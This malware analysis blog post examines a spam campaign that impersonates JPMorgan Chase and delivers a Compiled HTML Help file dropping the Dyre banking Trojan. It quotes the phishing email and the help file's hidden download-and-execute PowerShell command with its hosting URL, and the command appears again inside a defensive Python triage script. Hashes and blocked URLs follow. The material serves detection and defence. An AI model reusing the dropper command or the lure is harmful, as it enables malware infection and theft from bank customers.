Microsoft Help File Malware Targets JPMorgan Chase Customers

A fresh malware sample was recently spotted arriving as a Microsoft Compiled HTML Help file attached to spam messages. A Compiled HTML Help file is a single binary container that bundles a set of HTML pages (plus index and script content) and carries the .chm extension; the older WinHelp format used .hlp and is a different, non-HTML format.

The sample analyzed, a .chm file, arrived via spam email posing as a message from JPMorgan Chase & Co., a global financial services firm. The text of the email is as follows:

“Dear client,

As your personal manager, I would like to inform you that the terms for your credit agreement terms have been changed according to the new bank policy. Please consult the following Attachment to learn the new terms.

Yours sincerely,

Chase Bank.” 

The email carries an attachment named “cannon.zip”, which, when extracted, contains a .chm file named “Message.chm”.

Using a file viewer makes it clear that the .chm file is compressed.

When the .chm is opened, a command prompt window flashes up briefly, a hint that something is running in the background.

The help file contains this message.

Viewing the HTML source shows that the help file's shortcut object (its Item1 parameter has the form window,program,arguments) launches cmd.exe, which runs a PowerShell one-liner to download and execute another file:

<PARAM name="Item1"
value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe','%TEMP%natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%natmasla2.exe')">

<PARAM name="Item2" value="273,1,1">

The command downloads a file from a known malware-hosting site, saves it in the TEMP folder as natmasla2.exe, and immediately runs it through the ShellExecute method of the Shell.Application COM object, so no user interaction beyond opening the help file is needed.
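As an added example (not code from the original post or from ThreatTrack), the following Python triage helper shows how the shortcut object above can be picked out of a CHM's topic pages and classified. It assumes the .chm has already been unpacked (for instance with 7-Zip, `7z x Message.chm`) so the HTML is available; it does not decompress the ITSS container itself. The sample page embedded below is constructed: it wraps the two PARAM lines quoted in the post in the HTML Help ActiveX `<OBJECT>` (hhctrl.ocx) and `Command=ShortCut` parameter that HTML Help requires, adds a benign "Related Topics" object for contrast, and adds a `Click()` script as the usual auto-trigger, none of which the post shows.

```python
"""Triage helper for CHM-based droppers (added example, not the post's code).

Assumption: the CHM has been unpacked (e.g. `7z x Message.chm`) so the topic
HTML is readable; the ITSS container is not parsed here.
"""
import re
from typing import List, NamedTuple

# Magic bytes at offset 0 of every Compiled HTML Help (ITSS) container.
CHM_MAGIC = b"ITSF"

# CLSID of the HTML Help ActiveX control (hhctrl.ocx) that hosts shortcut
# commands. The post only shows the <PARAM> lines; the enclosing <OBJECT>
# and Command=ShortCut parameter are how HTML Help shortcuts are written.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Substrings that indicate a download-and-execute chain in the command line.
DROPPER_MARKERS = (
    "powershell", "downloadfile", "downloadstring", "shellexecute",
    "%temp%", "http://", "https://", "hxxp://", "iex", "invoke-expression",
)


class Shortcut(NamedTuple):
    window: str
    program: str
    args: str
    markers: List[str]


def is_chm(data: bytes) -> bool:
    """True if the blob starts with the ITSS 'ITSF' signature."""
    return data[:4] == CHM_MAGIC


_OBJECT_RE = re.compile(r"<object\b.*?</object>", re.I | re.S)
_PARAM_RE = re.compile(
    r"<param\s+name\s*=\s*[\"']?(\w+)[\"']?\s+value\s*=\s*\"([^\"]*)\"", re.I)


def find_shortcuts(html: str) -> List[Shortcut]:
    """Return every HTML Help shortcut object in a topic page.

    Item1 is "window,program,arguments"; the window field is usually empty
    when the author only wants a command executed.
    """
    found = []
    for m in _OBJECT_RE.finditer(html):
        body = m.group(0)
        if HHCTRL_CLSID not in body.lower():
            continue
        params = {k.lower(): v for k, v in _PARAM_RE.findall(body)}
        if params.get("command", "").lower() != "shortcut":
            continue  # e.g. Related Topics / ALink objects, not shortcuts
        parts = params.get("item1", "").split(",", 2)  # args may hold commas
        parts += [""] * (3 - len(parts))
        window, program, args = (p.strip() for p in parts)
        lowered = (program + " " + args).lower()
        markers = [mk for mk in DROPPER_MARKERS if mk in lowered]
        found.append(Shortcut(window, program, args, markers))
    return found


def triage(html: str) -> dict:
    """Summarise a page: how many shortcuts, how many look like droppers."""
    shortcuts = find_shortcuts(html)
    suspicious = [s for s in shortcuts if s.markers]
    return {
        "shortcuts": len(shortcuts),
        "suspicious": len(suspicious),
        "program": suspicious[0].program if suspicious else "",
        "markers": sorted(suspicious[0].markers) if suspicious else [],
    }


# Constructed sample topic page: the post's two PARAM lines inside the
# <OBJECT> wrapper (assumed), a benign Related Topics object for contrast,
# and a Click() auto-trigger (assumed, a common way to fire the shortcut).
SAMPLE_HTML = """
<html><body>
<object id="hhctrl" type="application/x-oleobject"
        classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
  <param name="Command" value="ShortCut">
  <param name="Item1" value=",cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile('hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe','%TEMP%natmasla2.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%natmasla2.exe')">
  <param name="Item2" value="273,1,1">
</object>
<object id="related" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
  <param name="Command" value="Related Topics">
  <param name="Item1" value="Getting started;start.htm">
</object>
<script>document.all.hhctrl.Click();</script>
</body></html>
"""

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_HTML), indent=2))
```

Run it over each .htm/.html file from the unpacked archive; any page with a suspicious count above zero deserves a look at the full Item1 value, since the program field alone (here cmd) does not tell you what the arguments do.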

The first downloaded file then connects to a PHP resource and receives instructions to download a second file, which contains Dyre/Dyreza. As noted recently, Dyre is a banking Trojan with botnet and other capabilities.

MD5 Hashes:

  • chm: 14b166abd7279baa483cfc6e33fc5a3e
  • First file (exe): e821100cd69a0902d6ac5b1e56874692
  • Second file (downloaded from rss.php): 72841b43391206f983b0fa2ea0be331a

VIPRE Detections:

  • .chm is detected by VIPRE as CHM.Generic.a (v)
  • First download is detected by VIPRE as Malware!Drop
  • Second download is detected by VIPRE as Win32.Generic!BT

VIPRE blacklists both URLs:

  • First download: hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
  • Second download: hxxp://nsgatewayllc.com/news/rss.php

The malicious spam containing this attachment did not originate from JPMorgan Chase or Microsoft. There is no evidence that JPMorgan or Microsoft, or any of their systems have been compromised.

Credit: Dean Lawrence M. Bueno – Malware Researcher

The post Microsoft Help File Malware Targets JPMorgan Chase Customers appeared first on ThreatTrack Security Labs Blog.